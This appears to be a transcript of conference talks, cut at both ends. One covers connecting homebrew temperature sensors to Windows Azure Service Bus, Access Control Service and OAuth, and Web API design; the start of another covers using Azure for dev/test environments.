house is on fire. So I want to clean that data out. Also I don't want to have an API on top of my database to get all that data directly. Maybe some sensors may be sending new data every couple of seconds and that's quite a lot of data to put in your SQL Azure database and I don't want that. So what this worker role is doing is it's catching all that data from the service bus topic and making sure it aggregates the data and creates an average over 15 minutes. So what you see in the temperature profile on the website if you go there is an average over 15 minutes. So you don't see the real time data, it's just an average of the last 15 minutes that you see there. And that's done by this worker role thingy. So why Windows Azure websites? Well it's a typical scale fast fail fast scenario. You can just come up with an idea, deploy it to Windows Azure websites and have it there for a very, very low price. You can test your idea. If people like it and people start using it you might as well scale up afterwards. But you can just test your idea quite simple, quite easily and quite cheap there. So I decided to test proofbody.net on Windows Azure websites and the fun fact is it's only a demo site I created but the fun fact is I have two users making use of this website. And I'm actually planning on retiring this talk because I've given it quite a lot of times and so I will have to inform those two guys to look for a different solution there. Sorry if that's someone in the audience, sorry to disappoint you. So Windows Azure websites, it allows you to build your application with whatever language you want basically. Is it ASP.net fine? You want to do Node.js perfectly fine? Do you want to do PHP, Python, Ruby or something else? Maybe even C++ and writing your own CGI handler. You can do that on Windows Azure websites. You can deploy quite fast as well. There's a couple of ways you can deploy. You can use web deploy, you can use FTP to deploy your websites and you can also just send your source code to Windows Azure which will then make a build of your website and put it on Windows Azure websites. You can start for free, okay, not for production use but you can test your idea, you can develop your idea and make sure it's actually working. And then afterwards you can just scale up and scale out. So you can scale up to a bigger instance but you can also scale out to multiple instances there. So that's what's happening. Basically Windows Azure website is high density web hosting. So the first time you go there and you deploy your website in a standard model, your website is actually just a website sitting on a server where a ton of other websites are also sitting. So you see this nice little guy smiling there. If you scale out what will happen is on some of those shared instances, they use one of those instances to have two servers of your website. But still that's two servers so you have some load balancing there but two shared servers. There's other people on those servers that you are using as well. Next step with Windows Azure would be to go to a reserved instance and basically what you would do is move your websites to one instance that's yours. So actually get an entire server for your website there. So you already see you can start really small on a shared environment and whenever you see traffic coming in, you can scale out to a reserved instance and have multiple websites of your own running on that reserved instance but only your websites, not the websites other people are publishing there. You can scale out again, you can make it 10 instances, you can make it 20, you can make them 8 core machines and so on. So you can keep on growing on this Windows Azure websites platform. So it's a perfect ramp up. You can start really small, you can just put your stuff there. It's cheap, you can actually start for free. Then when you see users coming in, you go to one shared instance, maybe two shared instances, maybe four. Whenever you see there's really a lot of traffic coming in, just scale out to reserved instance, maybe multiple reserved instances and just keep growing. I hope if you have to go to reserved instance that you have actually have money coming in, which is something I sadly did not do with this Brubali website but still you should have some income if you want to scale out. And then if you hit this limit of Windows Azure website, you can always grow up and make it a platform as a service approach or infrastructure as a service where you actually have your own web service for running this thing. So anyone used Windows Azure websites before? Anyone not used Windows Azure websites before? Still hence, which is a good thing in the afternoon after lunch and so on. So I'll give you a quick demo on how you can make use of Windows Azure websites. So if you go to the portal, there's actually an interesting thing. You can host 10 websites per data center for free. So you can basically experiment quite a lot and have a lot of ideas which you can test on the internet. So I can create a new website there. Let's say I want to create a new one. I can quickly create it and give it a name and you see one which still exists. I can select the data center there. So let's go with Northern Europe and create a website. It takes a couple of seconds and what will happen is you suddenly have a place where you can deploy your website. So it shouldn't be too long anymore. So this thing created an empty website. Something where I can deploy my own code into. If you don't want that, for example, if you want to have a WordPress blog, for example, you can just create a new website from gallery and you get a list of a lot of apps that are supported on Windows Azure websites. Not all apps are in there, but it's quite a lot and it's really easy to get started. So for example, my father wanted to start his blog. I just created a new website, selected WordPress and he has his blog in like five minutes. And I told him, yes, I spent the entire afternoon doing this. You have to buy me a beer for that. So it takes just a few seconds. So our first website we created, you get a host name there. If you now go to ndce1.azurewebsites.net, you should be seeing this nice little page stating that my website has been created. And from now on I can start working, create my own application, deploy it there and so on. So how can I deploy while I can use FTP? I can download a published profile which I can use web deploy with. So from Visual Studio I can just select my website, right click it, say publish website and we use web deploy for doing that. I can add a database and so on. If I don't want to deploy my compiled solution, I can also say that I want to deploy from source control in which I can select TFS, in which I can select GitHub, in which I can select Dropbox, Codeplex or whatever repository you have online that you might want to use to build your own websites. Next thing you can do is monitor your websites. So you can see the CPU time, you can see the incoming data traffic, outgoing data traffic, server errors, a lot of information in there. You can also configure my website. So I can run on.NET 3.5, 4.5, turn off PHP or upgrade to a better version of PHP. You can add my custom domain name, can add SSL, I can turn on or turn off logging. I may be interested in just warnings and errors, but I may be interested in very verbose information. I can select that, click save and literally seconds later this website has been updated and is now logging my data coming in out to the websites. So quite easy. If I want to scale afterwards, I go to the scale tab, I can go to a shared instance, I can select a number of shared instances, I can go to reserved, I can select large instance, make it 10, save and again seconds later my website is running on 10 servers with 4 cores in there. So it's really easy to get started, it's really easy to grow your website and grow your application by using this thing. And if you no longer need it, you don't have a contract there so you can just delete the website and the website is gone, you're not paying anymore and your idea is also gone from the internet. So Windows Azure websites is kind of interesting to do all that with, but let's talk about connecting those temperature sensors to the service bus first. So how would you connect sensors to your application, get our data like temperature, get our data like I don't know whatever you want to get our data from in sensors? Well, a good candidate for doing that is Windows Azure service bus, why? We'll come to that in a few seconds. So Windows Azure service bus comes with two main features, one of the interesting features there is the service bus relay, which is this one. Basically what you will have is you have a client, you have a server and they cannot communicate with each other directly. There's firewalls in there, there's grumpy system administrators that don't want to open that firewall, so you cannot connect this client and the server directly with each other. So what you can do then is just make use of the Windows Azure service bus relay, have outgoing connections made on both sides, so the client connects to Windows Azure service bus, the server connects to Windows Azure service bus and service bus will start providing a relay there, which is a very interesting thing if you're doing development and you have a very restrictive environment where you cannot put a WCF service for example on the internet from within that network while you can use Windows Azure service bus relay to do that. But that's not how you would connect sensors, right? A second big feature in the service bus is Q's topics and subscriptions. So basically what you can do is you can have your sensor posting data to the service bus. You don't see any processing going on this slide yet, so what you're doing is just gathering all the data, collecting all the data in the service bus, posting all that data into the service bus and just making it a long queue of sensor data in there. What you can then do is fire up one of your worker roles or just a couple, all making use of this queue. So the sensor posts data into the queue, the worker pulls the data out of the queue, processes it and maybe posts it into a database. The interesting thing of working this way with the sensor data is that you have a very loose coupling between the sensors and your actual service. If no workers are running, the data will still come in. Sensors will not see that there's no workers running. Sensors can still put their data on this queue without any interruptions. So no one complains at this time if this happens on a Sunday morning and all your workers go down, no one will call you because data is still being pushed and nobody will see anything is happening. The only thing they will see is that their data is not being processed quickly enough. If I only have one and I have a million sensors, maybe my data is not being processed fast enough and maybe the data will take half an hour to be processed by a worker. It may happen but still my web server or my web service is not going down. My service is still running, I still get all those messages in and something gets processed on the other side. If I then scale out, I don't have to think about which sensor should connect to which WCF service or something like that. No, I just keep pushing that data into the queue and the workers will just pull the data out of this queue. So I can easily scale as well. If all of a sudden everyone starts brewing beer and everyone starts adding sensors to my brewbuddy.net websites, I can simply choose to scale out my workers and I don't have to change anything else. My service layer stays the same, my sensors just push everything to the service bus and I don't have to do anything to have multiple servers processing that data. So workers can scale independently. If I have one worker, that's perfectly fine. Data may stay longer in the queue but still the queue is running and all the sensors are running their data through. I can add 10 workers and data will go through quite fast but I can scale them independently from the source. Imagine you are building this thing with your own API. Imagine you have sensors and your own server where the sensors push their data to. If you have more sensors there, you would have to have more servers running this service, right? Because otherwise if you have a lot of sensors and only one web server accepting all that data, that web server will crash, probably. With this approach, you basically get all that data in the queue, process it on your own pace and you don't have to care about the fact that you have 10 million sensors and only two workers processing this data. Workers can also fail independently. So imagine that you are running your own solution posting data from sensors to your own server and you might come up with a brilliant idea of having groups of sensors. The first million connects to that server, the second million connects to that server and so on. If that's the case and one of those servers fails, a lot of data is still being processed but not of those one million assigned to that one specific server. In the case of using Windows Azure service bus, your data still gets in. A worker may crash but the data will be processed by the other workers that are in there. Also, I decided to connect the sensors directly to the service bus. My initial thinking was, okay, so I have these sensors. Maybe those sensors can post data to my own servers and then from those servers, I will be posting the data into the service bus. Nice approach. I get my own domain name for posting data there but it's kind of hard because again, if I have a lot of sensors posting data, I have to scale this tiny layer which is my API accepting all those messages from the sensors which then push it on to the service bus, which is kind of stupid because I have to pay a lot for that intermediate layer there accepting requests and putting it on the service bus while it's actually not doing anything useful except taking data and putting it on the service bus. So I decided to just use service bus directly and sensors will connect directly to the service bus. Which is interesting because service bus, it's running on Windows Azure. It's designed to scale. It's designed to go to big web farms so they just have enough endpoints there to handle all my sensors for the service bus. Now one problem when doing this is if you have a lot of sensors and only one service bus, how do you do authentication and authorization? How do you know that a specific sensor can actually post data into your service bus? How do you know someone is not just distributed denial of service attacking your service bus with bogus data? Again, those workers are filtering out bogus data but if someone is just posting temperature values above 50 degrees continuously, they do a lot of work for nothing and my queue is filling for nothing because I don't want to process that data. So you want to have some authentication or authorization mechanism in there. Now who of you has been using service bus? Not too many. The interesting thing is if you create a service bus namespace on Windows Azure, you also get an access control service namespace with that. So if you create a service bus namespace through the portal, let's go there. Where is it? Service bus. I have my brew buddy service bus there. I have my queues and my topics and my relays and all that information in there. But I don't have any authentication info here except this one user which can post and read data from this service bus topic. If you just take the namespace of your service bus, add dash sb and put access control.windows.net after it, you get this thing. So you get your access control service for service bus. Interesting thing there is you can create service identities. So by default when you create your own service bus namespace, you will only get this owner in there. Interesting thing is I can add users there. So for every sensor I have, I just add one user which is allowed to post data to my service bus. How do those sensors get limited on what they can do with the service bus while using the rule groups? So whenever you connect to ACS, whenever you are using the access control service, every authentication step you do there is validated through these rule groups. So if we go to the rule group for brew buddy, you will see that we, sorry, it's this one for service bus, you will see that we get a number of these actions in there. And if we have a look at those, I'm just going to open a couple of them. You will see that if the owner is coming in, so the traditional owner you get for the service bus, I'm giving it a claim called action with the value listen. So if the owner connects the service bus, he is allowed to listen on the service bus topic. Next rule, if the owner comes in, he also gets the send rule. Next rule, if the owner comes in, he also gets the manage rule. So you see you can actually specify which user on service bus can do which operation. The owner of course can do every operation, but your sensors, well, just give them the send claim. So they can send data to the service bus topic without being able to consume the messages on there, without being able to manage the service bus. So that's what I did there. I just added some logic in making sure that all this works nicely. So you don't see any sensors in here. So let's add a sensor in there. So the architecture is slightly different. We also have access control service managing all the access to my sensor topic on Windows Azure service bus. So if you do this, how do we link a sensor? Well, sensors have an ID or maybe if you have a lot of sensors and you really are making money out of this solution, maybe in the factory where they create those sensors, you put in an ID, a unique identifier on the flash chips in that sensor, and you use that one to authenticate with. So that's what I did. In my taskbar, you will see that there's this nice little application with a pint icon, which states that it is currently not linked to brewbody.net. So you will see that it's not embedded drawing on screens. So it's not linked to brewbody.net, but you see there's a sensor ID in there. The only thing I have to do is copy that sensor ID, and I hope this works because I am really bad at writing multi-threaded Windows Forms application. It doesn't work. Awesome. That's the thing with demos. I've tried this like in the past two hours for a couple of times and now it doesn't work. But I know a way to fix this. No, I don't know a way to fix this. Come on. Okay, I'm going to restart that thing. So, Control Alt-T, Task Manager. Let's stop our sensor and let's restart it as well. It's this one. So the sensor has an ID. I can copy the ID to my clipboard, and go to the brewbody.net websites, which is this one, and link a temperature sensor. Now, to show that this actually works, I'm going to create a new brew. So let's go to my recipes, create a new brew of this one. Let's call it another batch. I'm going to say it's currently from an implementation stage. Next thing I can do is link a temperature sensor, put the sensor ID in there, and link this sensor. Easy as that, and data should be coming in. If I now click my sensor icon, you will see that it's now linked to brewbody.net. So all I did was copy in the sensor ID, and behind the scenes, what happens is in the service identities, I now have my sensor ID as well. So you see that the brewbody.net website added the sensor ID in there to make sure that I can send data to the service bus topic. If I go to the rule groups, you will also find that in there, somewhere, one of those rules, this one probably, is in there stating that this sensor ID can perform an action on my service bus, namely sending data. So I've just basically automated provisioning of users on service bus so that they can send data to my service bus topic. How do you do that in code? Well, that's actually quite simple to do. That's my brew service. So if I want to link a sensor, what I want to do is use the service management wrapper for Azure Access Control. That's actually a hard one to write, but luckily on UKit, there's a package called Fluent ACS, which you can use to do all these things. So I'm checking there if a current rule exists for this sensor, and if it exists, I'm deleting that rule, right? Next thing I'm doing is creating a new service identity, which has the sensor ID as the username for the sensor. I'm also creating a service identity key, which is the password for my user. And in this case, just for demo purposes, username and password are the same thing. But if you are doing this with a more professional application, you would take something that's embedded in the firmware and maybe some key you give to the user on a plastic car or something, just to make sure that no one else can send data to this service bus topic. Next thing I'm doing, saving those service identities, adding a send claim for this service identity, and that's basically it. So everything I did through the portal, everything you can do through the portal, you can also do this using an API. And this is actually a really interesting way of managing who can send data or can consume data from your queue you have there. Unlinking is exactly the same. I'm just checking if there is a rule for the sensor, if the rule exists, I'm removing the rule. And you will see if I do that, that immediately, or quite immediately, the sensor is being unlinked from my temperature sensor. So if I go there, I'm going to select it so I can link it again. And I unlink this thing. You will see that on service bus, my service identity for the sensor has suddenly disappeared. So I'm just communicating with ACS and making sure that only specific users can send data to this thing. Also in here, you will see that my sensor is now no longer linked to BrewBuddy. And I can link it again and so on. Okay, cool. So we can now link a sensor to our brew, and that's quite interesting to do. Next thing I thought about for this application, if you want to build your own social brewing application, I was thinking, okay, we have sensors, we have all that stuff for managing our recipes, but how do you become popular nowadays on the internet by building an API? So that was the next thing I thought about for this application. So if you look at how we've been consuming the web in the previous years, you will see that we've been using desktop browsers and then in 2000 data or something, Sony Ericsson was coming with these little web browsers. I don't know who has used those in the past. Like very crappy internet sites, but you could still do some mobile browsing there over a very, very slow connection. Then suddenly this new smartphone came. iPhones, androids came, Windows phone came, and everyone started consuming the internet not by using a mobile browser, not by using a browser which was rendering text, nor by native applications running on top of those devices. So if you look at how you are consuming, for example, I always check the weather in the morning. I don't do that by navigating to a website showing me the weather. I just have an app on my smartphone which I fire up, it loads the data, and I'm consuming that data in that application. So I'm still consuming the web, but only the data one service has to offer there. Tablets came around, tablets again have their own native applications, and I kid you not, you will see fridges, you will see smart thermostats, you will see a lot of devices also connecting to the internet. Maybe if you think a fridge will never connect to the internet while Samsung, the guys who have a smartphone in every format, this is their biggest smartphone, a fridge. So you can, if you're a Twitter addict, you can tweet in the morning that you are taking something out of your fridge. You can see the weather on there, a lot of applications are on there, and they are all fetching data from the internet. So more and more devices are making use of that stuff. Just to prove my point, and I hope this time it works, but sometimes people tend to just use the website. Who of you is on Twitter or Facebook? Okay, most of you. How many of you are only using the websites to consume Twitter or Facebook? No one. Yes, I'm proving my point. So no one is actually using the website there. Everyone is probably using applications on their smartphone, on their tablets to consume Twitter to post their status updates and so on. So I think those two websites, they have great data, they have a valuable service, they have all these social features and so on. But I think the growth that they've seen, a lot of that growth is thanks to having an API for that application. So as the French say, let's make everyone happy. So what is an API? It's just a software to software interface, which is not telling a lot of things because if you're developing your own class library, you're basically also creating an API. You're just creating an interface that each other may use to connect to your code, to connect to your application and so on. So that's an API. A lot of blah, blah on this slide, but an API in the modern world or the APIs I wanted to have in my application are the REST-based APIs that have a URL which give back JSON data and so on. So really the modern API that is running on the web. If you want to build your own API, make sure you think about building an API. You want to have something valuable. I don't think anyone will be interested in having another API giving you the possibility to reverse a string or maybe base 64 encode a string or something. There's APIs doing that, but I don't think there's much value in putting them out there. A valuable API may be exposing your weather data. It may be exposing recipes on BrewBuddy. That may be valuable. Some people may like to build an application for consuming their recipes there, so they don't have to open their web browser while brewing, but they can just use an app on their smartphone to check the recipe. APIs also have to be flexible. You are not in control of the clients of your API, typically if you're building a public API on the Internet. People may start building applications on top of that API. The last thing you want to do is break the functionality they currently have, because that would mean no one using those applications can no longer use your websites or your web application. You have to think in terms of being backwards-compatible or versioning of the API messages and so on to make sure that everything you are offering today can still be offered afterwards. You have to be really flexible. If you add a property, don't require that property, but just make sure that older clients not supporting that property on a given object can still connect to the API. Manage your API. Again, the last thing you want to have is that your website is running, but those users who have their kettle on the fire and are brewing that beer are not able to use the application they have on their smartphone. So you have to manage this thing, you have to support this thing, make sure it's up and running. If you look at Twitter and Facebook, for example, they have these nice API status pages where you can navigate to and you can see the status of every API endpoints and be sure basically about what they are offering and what services may be down at a given point. And most of all, have a plan. Don't just put something out there. Think about what you are going to put out there, where you want this API to evolve afterwards, because it may be a technical thing that you are offering to your users, but still it's a way of consuming your data, of consuming your service. And you want to make sure that you have a plan there, how you want this API to evolve over the years. But the basic idea of those APIs is reaching more clients, either by building your own apps for those devices or either by having other people like fans of your website build those apps for your website. Doing that in ASP.NET, Web API is a logical step if you are in the.NET ecosystem. There's a couple of other frameworks. There's Nancy Avix, there's other Sinatra-based APIs that you can use to build your application. But ASP.NET's Web API is quite a nice one to work with. Anyone worked with that before? Okay, quite a couple. For those who didn't raise their hand, did you work with ASP.NET MVC, for example? Okay, I see a lot of nuts. So ASP.NET Web API is very similar to ASP.NET MVC. What you have is a framework to build HTTP services which use a RESTful model. So you can have resources which represent some data or service in your API. You can add validation, you can add things like, imagine you want to consume a recipe of your brew. And with that recipe, imagine you can take a picture of your brew. So you have a picture to refer to if you are consuming the website. How would you build an API for consuming both the recipe and both that picture? Well, there's two ways there. In my opinion, wrong way of doing that is having two endpoints. Two URLs, one for the image, one for the recipe. That's bad. Because HTTP, if you're using HTTP-based APIs, you have this content type header which you can use. And if you just have recipe slash some idea of the recipe, if you're giving that endpoints the accept header, for example, that you accept an image, well, then the API can simply return an image. If you ask it to return a JSON data file, you just return a JSON data file there. So ASP.NET Web API comes with functionality for all those things. So it's really easy to be building an API. Now, one thing to make sure is that you are quite detailed when building the API. So since everything is running on top of HTTP, there's a lot of things you can do. You have status codes and status messages. If you are querying your API and you want to retrieve a recipe from the database and that recipe does not exist, don't just throw an error. Return an HTTP 404 status code and say the recipe has not been found. HTTP already contains those status codes and already contains a means of transporting those error messages across the wire. So make sure that you are using those. Also be detailed. There's a lot of status codes. There's a status code 401, for example, which tells the user that they are not authorized to use a specific resource or they are not authenticated if they get a status code 403. So be detailed in those status codes so the user of your API knows exactly what he is doing or not seeing. And there's actually a nice RFC who likes reading RFCs. I don't, but I actually read this one, which is RFC 2324 or the HTCPCP, the hypertext coffee pot protocol. It's an April Fool's joke from the guys doing the internet, basically. But it's kind of an interesting thing of looking at an API. They have a lot of extensions on top of HTTP. They have detailed error messages and so on. So what I want to do is show you how you can be detailed in your error messages. And yes, I have too much time on my hands sometimes. I actually built this hypertext coffee pot protocol using ASP.net web API. So you can use this one as well. Just go there. It's running on a free Azure website. So don't use it too often or my quota will just die and the website will die. But you get some examples there of how you can consume this API. So if I'm using Fiddler and I want to start brewing a pot of coffee, I can simply use the brew keyword. I'll show you this. Use the brew keyword instead of post instead of using get. I post this to a specific resource, which is one specific pot of coffee which is sitting on that server. I tell it that I am sending a message of the coffee pot type. I'll show that one in a second. I accept milk and cream. Actually, I don't accept milk and cream. I like my coffee black. So let's remove that one. And my message body will be, well, a coffee message body saying I want to start brewing. Fiddler is showing this in red because it doesn't know the brew keyword. But I added it to this API and I can just execute this thing on my coffee pot. The result of this call 201. Again, be detailed. So I created this brew, which means I have to return a 201 status code and say, well, the coffee pot has been created. 201 created. Be detailed. Now, if I do the same and I ask coffee pot number one, for example, to brew my coffee, you see that I'm getting back a 418 error message which is specified in that hypertext coffee pot control protocol which is stating HTTP error 418. I'm a teapot. So I cannot brew in there. Be detailed about what you are doing. Give detailed messages about what your API is returning there. So I did all of that. I built my API into brew body. But a lot of public APIs are kind of weird. Because think about it, if you're connecting your Twitter application or your Facebook application to Facebook for the first time, what you do is you don't want to give your credentials to that application. The last thing you want to do is give your Facebook credentials to some strange application you just installed. So what most of those applications do is they redirect you to Facebook. You log in with Facebook and then Facebook tells the application that that application can do some stuff on your behalf. So that application is not telling Facebook or not telling Twitter that it is you. It's just telling that it's acting on behalf of you. So your API consumer, the application you have there, is not your user. Which is kind of difficult. How would you tackle this? Well, a good thing is a lot of websites do this, take this approach using OAuth. What you have is something like this website where they put a link, sign in with Twitter. I click that link and I'm being redirected to Twitter. And Twitter knows this application. They know the client application that is requesting access to your data. So as you can see, there's this token in the URL that they are using to recognize the client application that wants to connect here. I log in. Twitter asks me if I want to grant access yes or no. Once done, they redirect me back to the application and I'm logged in. They can see my picture. They can see my friends on Twitter. Basically, all the information I allowed the application to get. Yet, I can simply go to Twitter and say this application can no longer access my data. Because the application is not being logged in as myself, it's doing stuff on behalf of me. And that's a very important thing to realize there. If you want to build this yourself, if you want to build your own OAuth flow and make sure that you can have this flow of being redirected to the application, having to log in on your application and being redirected back, there's actually quite a lot of code you have to implement for that. You have to have an authorization server. You have to keep track of which user granted access to which application, which can consume your data and so on. So it's quite difficult to do. Luckily, there's a nice hidden feature in the access control service which can do a lot of the heavy lifting there for you. So if you want to build OAuth or you want to use OAuth in your client, you can actually delegate a lot of that work to the Azure Access Control Service. So what would happen is if I have an API consumer, imagine I have a client application wanting to connect to BrewBuddy. I have that consumer. I have my application. What will happen is the API consumer goes to brewbuddy.net, redirects me and asks me to log in yes or no. And if I want to give access to this application. On BrewBuddy, I click yes or no. And if I click yes, I simply call into the access control service again using this management API. And I tell them to basically know that this API consumer, this application is allowed to access the website and all the services sitting there on my behalf. Next thing that happens is the API consumer has to get a little token to prove to BrewBuddy that it's actually been validated. To prove that it's acting on behalf of me, that can act on behalf of me to just view my recipes and so on. To get that token, you don't have to implement anything. You just use ACS. Simply telling ACS that a client will come someday asking for a token proving that it can act on behalf of a specific user while you can delegate all that to access control service. So let's give you a very quick demo because I only have seven minutes left. So I have my BrewBuddy website. I can do whatever I want there. BrewBuddy knows one client application, which is this one, my Brew recipes. Again, based on service identities in ACS, I created a service identity identifying my client application. So this client application is simply a third party website that wants to use the data coming from BrewBuddy.net. So I have this thing running in my visual studio. Well, I don't have it running, so I have to start it. It's this little website, very ugly website, by the way, which says I want to fetch recipes from BrewBuddy. This is not BrewBuddy, but it's granted access to consume recipes on BrewBuddy. It's granted access to consume and use the API on BrewBuddy, but not on my behalf. So this application is known by BrewBuddy. It can connect to the API, but I haven't told it yet that it can actually access my data. So if I click login on that website, I'm being redirected to BrewBuddy, on which I have to login. Once I login, it will ask me if I want to authorize this my Brew recipes to work on my behalf, to retrieve my recipes and to access my friend list on there. I can say no, take me back to the application, nothing will happen. If I click yes, in Azure Access Control, a delegation is written, and now my client application, in this case my Brew recipes, can connect to my API. So I'm being redirected back to my Brew recipes. You see that I get back this code, which basically states that I have been authorized by BrewBuddy to access this thing. I step through all my codes. I can see that I'm now authorized and that no error is there. Next thing I can do is simply call the API on BrewBuddy. So you can see that I'm now calling this API live on the Internet and just getting the data from there. And I'm getting back the recipes, which is kind of easy to do, but probably you don't want to implement the entire flow yourself because it's quite hard to do and quite hard to do it right and in a secure fashion. But remember that you can just use ACS for that. And it's sort of a hidden feature because you have those service identities sitting in Azure Access Control, and I can see my Brew recipes has been registered, but I cannot see all the users that granted access to the API. Fun thing is, if you are using the service management API for ACS, you can actually see that. So you can view which users have been granted access to that thing. And I think even I should have started that before, but I have a small sample showing that it can actually do that stuff. So that's this one. Delegations, viewer. There we go. So this thing is also using the management API. It's connecting to my BrewBuddy service. And as you can see, up until here, that's all data I can see in the ACS management portal. But all the users that are allowed to access my API are these guys. You cannot see them through the API or through the management portal, but if you are using the API to work with ACS, you can see those. And that's where it bases itself on to basically grant you access to the API or not. Don't build this yourself. Have ACS do all that for you. If you want ACS to do all that for you, I've created a Nukeit package for that. So that's this one. It's all open source. If you find any bugs, please feel free to fix them for me or if you don't want to fix them, just email me and I will try to fix them. But if you want to delegate all that work to Windows Azure Access Control, this package adds all the plumbing into your project to do that. So take a week of this session. I hope some people will start brewing beer. The cleaning is not fun, but you have to do it in order to get some nice end results afterwards. We've seen websites, which is a great platform to just deploy something, test your idea, make sure that the things you were thinking about like getting money out of it are working. In case they are working, you can scale out, scale up to multiple instances, scale out to reserved instances and so on. So it's really ideal to just throw your stupid idea on the Internet while stupid idea and start working on it and make sure that maybe it will work, maybe it will not work. You can combine services at will. So in this case, I've been using Windows Azure websites with SQL Azure with the Worker role with sensors with Service Bus. You just take the things that you need for your solution. You don't have to use the entire Windows Azure platform. If you want to have your own web server running the website, but still want to make use of the Service Bus, you can do that actually. Service Bus is a very nice thing to work asynchronous and to scale out. I've been using, there's actually a nice example of that. The company I worked previously, they were gathering sensor data as well. By using the Service Bus, they only needed like two servers to process all the incoming messages instead of having all this entire web form of servers running IAS and accepting all those calls coming in. So it's a great thing for asynchronous. If one of those workers crashes, no worries because everything will still arrive in the Service Bus and you can still pull that data out afterwards. Access control for devices, use those claims to grant access to write data on to the Service Bus or to deny data from the Service Bus. If you're building a web API and you need your own security mechanism and you are planning into using OAuth, make sure you look at the Access Control Service because it can actually do a lot of the heavy lifting for you there. So with that, I thank you for being here and I'll enjoy the rest of the conference. Thanks. So if you have any questions, feel free to come up.
|
Inspiredby one of the Windows Azure gods (Wade Wegner), Maarten decided to order a homebrewing starter kit. Being a total cloud fanboy, he decided to hook thosedelicious creations to the cloud. Join Maarten and discover how you can connecta USB temperature sensor to Windows Azure to monitor brewing and fermentationtemperatures. He'll show you how to do distributed, social brewing in this funyet practical session on an interesting use case for the cloud: beer.
|
10.5446/51471 (DOI)
|
All right. Welcome to this session. You guys are the cool ones, that's for sure, because you have understood that it's this session room that you're supposed to be right now. This is the one session in this time slot which is important because DevTest, as we all know by now, there's been actually plenty of continuous deployment talks in this conference. And DevTest, for your environments, is extremely important. In fact, you look brilliant out there. This is you, actually. Did you stretch today? This is you, guys. It is very important to be fast, to be slick, and to be cool, and that's what we all want to be. And we're going to talk about that today in the terms of things like this. Has your boss ever come into your office demanding a new test, a new demo environment for a customer presentation? Has that ever happened to you? And you were like, what, now? And he's like, yeah, now. If I wanted it tomorrow, I'd swing by in the morning, right? That's right. And the testers, we got to get the latest builds on the test server because otherwise that story won't be part of the sprint goal. Has that ever happened to you? I don't know that all testers sound like that, but they kind of sound like that to us when they come in, right? That's what they sound like. Any testers in the room? No, nobody wants to raise their hand now. And also, I mean, did any of you ever deploy the connection string, the development connection string to live production? Anybody? Yeah, a couple of us. This has happened to me. It's not fun because way back when on this platform, the Windows Azure platform, it took about 20 minutes if we were lucky to deploy something, right? That's about the time that it took. And there really wasn't any checking for any errors or anything. So if you made the tiniest bit of mistake like dev connection string settings, right, you had to go and do it all over again. You have to wait another 10, 20 minutes to get there. It was just frustrating. But now, today, we get almost instant deploy times to Azure. And you get some warnings for many of the errors that you didn't get before. And also, the boss, the testers, the stuff that we're going to talk about here today is going to make these guys go away for good. It's going to leave you in this then state of development where you can just focus on the undisturbed development experience because that's what we all want. My name is Magnus Martenson. I'm a Windows Azure most valuable pilot. I work for Active Solution in Sweden. It's a.NET shop. And what we do is build.NET solutions for our customers and a bunch of Windows Azure, of course. I also love doing community work. I got to point this out, the Global Windows Azure Boot Camp. Anybody in the room attended one of those? Yeah, there's a couple of them. You were in the Oslo one? No? Australia. Well, welcome here, sir. Welcome. Australia. That's awesome. Australia had three locations, as I recall. There were 92 on April 27th. There were 92 locations worldwide that did this Global Windows Azure Boot Camp event. It was a full day workshop thing at every location. But we all did it on the same day. We also did a huge render lab that we did together. Every attendee could deploy the render lab and crank up a bunch of instances in Windows Azure. And all of those instances joined in a huge render farm. At one point we had about four and a half thousand instances running simultaneously. We rendered more video. That's what we did. We rendered more video or used more compute power than some of the earlier Pixar animation films. About eight years' worth of render time during the lab. It was awesome fun. So keep an eye out for this for next year. We're going to redo it probably even bigger. It was fun. And also I want to point out the upcoming conference, which is going to be online. So September 19th to 20th on the Internet Near You, all of these cool Windows Azure folks are going to be talking, giving presentations. They're going to be streamed online. So we have a two day full content of awesome presentations. Do check that out. Okay. Let's get going. So how many people in the room are using Windows Azure or have been using Windows Azure? That's most of you. All right. So I guess the first demo if you want is not really any news to you. I'm just going to get things going here. We'll just create a NDC. I wonder if that's available. NDC is available. Let's do that. NDC North Europe, create a website. I guess you've all seen that you get a website up and running really fast. Just wanted to make sure that we do a demo early in the presentation. Click on it and you have a website up. Okay. Cool. So what we want to do is take this little website that I have here and deploy it using web deploy. Of course, we go in and say publish. And then it seems we need to have some kind of publishing profile that I don't have. So I go into the portal and I go and download the publish profile. On my new website, save that to my local drive and pick it up inside of Visual Studio. Okay. Publish. You've seen this, right? Anybody never seen this? One. Awesome. We're doing this for you. Actually, I'm setting up the site so that we can use it for other demos. So that's why I'm doing it now. It's going to take a while. Actually, it's going to show me a browser window when it's done. And there it is. There's the web deployed website. And it's really fast to deploy and you can just go how many ever many times you like. It actually becomes faster now because it's only going to sync up the changes, the changed files and so forth. So it's not going to be as slow. Alright. So there we have it. Website, Windows Azure. Let's talk about fear for a moment. Fear of change. I use this picture to symbolize fear of change because as human beings, we don't like changes. Changes are scary. And this is of course when wagons were able to be automatically mobile on their own, right? Coming down the street without the horse in front of them. They were auto mobiles, right? And that was really awesome scary. Some people were like, ah, it's the devil's carriage. And so forth. And just to sort of cushion the blow for people, they mounted this horse's head on the front of the carriages, right? So that they would be less scared for them. And actually, some of the first designs of these had a whip holder on them because, you know, if you don't have a whip holder, we're going to put the whip, right? Of course. Makes sense. So changes are really scary. And now Microsoft is talking about a lot of changes. And this is from the keynote of TechEd. I was there last week. And I gave this presentation actually. So it's an awesome warm up for doing my presentation here at NDC. And this is from the keynote. This is Scott Guthrie. And he was pointing out that you really need to use Windows Asher for a dev test environments. And he's absolutely right. And I was sitting in the audience going like, yeah, I wanted to stand up and going, yeah, that's right. You need to do that. And then he showed us that, you know, when you shut down your test environments during the night, it's not going to cost you anything. So that's a good thing to do, right? Also, he went on to go like, now we're announcing per minute billing in Windows Asher. And I want to be, hey, man, hallelujah. Because I've been waiting for this. We're waiting for this for a long time. It's good. Because before, I don't, how many know that before, the billing was per hour, right? And not only that, it was per clock hour. So it wasn't like, if you deployed something five to 12, then you still paid for the hour between 11 and 12. And it maybe wasn't that much money, but it was still was a nuisance. And if you wanted to be really careful with your spendings and so forth, you got to make sure that you started your deployments after the hour and, you know, so forth. And you don't want to even, you didn't even have to bother to tear something down at, you know, 20 past. You might as well wait until, you know, five to an hour. But now it's per minute billing, so it's very effective. And this also, I don't know how many of you know this. Did you see the keynote at TechEd? So they dropped prices to almost, almost nothing. And I'll talk about in the end about how you basically should use your spending. So I'm 